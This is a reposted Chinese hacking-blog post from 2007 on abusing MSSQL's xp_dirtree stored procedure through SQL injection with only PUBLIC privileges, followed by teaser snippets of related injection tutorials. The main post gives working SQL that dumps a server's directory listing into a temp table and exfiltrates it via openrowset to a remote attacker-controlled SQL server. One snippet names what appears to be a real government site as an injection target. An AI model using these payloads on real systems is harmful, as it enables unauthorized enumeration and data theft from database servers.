MSSQL注入PUBLIC权限下的xp_dirtree再度利用

转载 2007年09月18日 13:54:00
本来这文章在TEAM里面放了好久的了!只 是<<art of sql injection>>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先 发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...

正文:

提 起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是 系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法 建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧

--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表

create table ##nonamed(

       dir ntext,

       num int

)

--调用存储过程把执行回来的数据存到临时表里面

insert ##nonamed execute master..xp_dirtree 'c:/',1

--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')

select * from ##nonamed

以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了 


Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964

DB_OWNER权限得到mssql服务器IP的方法

http://www.myhack58.com/Article/html/3/7/2009/24978.htm 现在注入横飞.工具一大堆,过去手工注入的时代已经不复存在. 代之的是NBSI HDS...
  • eldn__
  • eldn__
  • 2013年04月21日 00:15
  • 746

mssql手工注入

报错注入: 例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 【1】首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixu...
  • niexinming
  • niexinming
  • 2015年10月11日 22:52
  • 4047

初探MSSQL注入

探索MSSQL下,有了SA注入点到底能走到哪一步!
  • xihuanqiqi
  • xihuanqiqi
  • 2013年12月27日 19:02
  • 3635

MSSQL 创建用户和权限简单操作

-- 创建登陆,无密码策略,密码不过期 CREATE LOGIN [test_l] WITH PASSWORD='pwd1213',DEFAULT_DATABASE=[db_1], CHECK_EXP...
  • jc_benben
  • jc_benben
  • 2016年03月21日 11:25
  • 1032

【安全牛学习笔记】MSsqlL注入取得网站路径最好的方法

exec master..xp_dirtree'd:/test' 假设我们在test里有两个文件夹test1和test2在test1里又有test3 结果显示 subdirectory ...
  • edu_aqniu
  • edu_aqniu
  • 2017年10月31日 23:35
  • 92

MSSQL创建用户角色及授权

要想成功访问 SQL Server 数据库中的数据, 我们需要两个方面的授权: 获得准许连接 SQL Server 服务器的权利; 获得访问特定数据库中数据的权利(select, upda...
  • hui_feng
  • hui_feng
  • 2016年09月14日 16:20
  • 1593

SQL server手工注入学习笔记

MSSQL注入(SQL server) 由于这学期正在学数据库,所以理解SQL语句还是可疑的。看完视频后自己动手实践顺便整理了学习笔记,有些来自视频有些来自其他大佬的博客。 一:判断是否有注入 ...
  • qq_32360995
  • qq_32360995
  • 2017年05月07日 12:27
  • 664

SQL注入取得网站路径大全

如果网站只开了80端口,你会发现下面的方法是比较有用的  其中用的方法几乎都不是我发现的,文总包括一些注入时的个人经验和技巧  方法可以说有4种(现在已知的)  第一种方法:  这个是>中介绍...
  • eldn__
  • eldn__
  • 2013年04月20日 14:17
  • 1753

关于SQL注入点的总结

一:注入类: access数据库  首先猜解管理员密码: 手工猜解(当然,如果你有基础,这里就很简单。如果没学过,其实只要记下一些常用的语句就可以了。) 工具猜解。我建议用zwell的穿山甲,也就...
  • u013035751
  • u013035751
  • 2013年12月17日 08:09
  • 961

注入过程中UNION在不同环境的使用注意事项

注入过程中UNION在不同环境的使用注意事项 2010-08-18 11:23:10 标签:sql union 休闲 注入 职场 http://ynhu33.blog.5...
  • kendyhj9999
  • kendyhj9999
  • 2014年02月28日 15:59
  • 869
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:MSSQL注入PUBLIC权限下的xp_dirtree再度利用
举报原因:
原因补充:

(最多只允许输入30个字)